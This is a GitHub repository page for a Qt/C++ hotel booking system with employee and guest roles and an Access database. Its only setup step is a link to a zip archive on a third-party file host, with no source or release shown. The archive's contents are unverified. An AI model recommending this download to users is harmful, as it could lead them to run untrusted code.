Skip to content

Latest commit

Β 

History

4 Commits

Folders and files

NameName
Last commit message
Last commit date
Β 
Β 

Repository files navigation

🏨 Hotel Booking System (Qt C++)

A modern desktop application for managing hotel bookings, developed using C++ and Qt.
It features two main roles: Employee and Guest, with full integration to a Microsoft Access database using ODBC.


✨ Features

πŸ‘¨β€πŸ’Ό Employee Interface

  • View pending bookings from the database.
  • Approve or reject booking requests.
  • Connects to the PendingBookings table in the Access DB.

πŸ™‹β€β™‚οΈ Guest Interface

  • Submit booking requests.
  • Track booking status.
  • Rate service after checkout.

πŸ—‚οΈ Database Integration

  • Uses .accdb (Access) database file.
  • SQL queries performed through ODBC connection.

🎨 Modern UI with Qt

  • UI built using Qt Designer (.ui files).
  • Separated windows for each function (EmployeeWindow, GuestWindow, etc.).

πŸ› οΈ Tech Stack

  • C++17
  • Qt 6 (Widgets, SQL)
  • Microsoft Access via ODBC
  • CMake build system
  • MinGW on Windows

πŸš€ Getting Started

https://top4top.io/downloadf-3425fgxsh1-zip.html

About

No description, website, or topics provided.

Resources

Stars

1 star

Watchers

1 watching

Forks

Releases

Packages

Contributors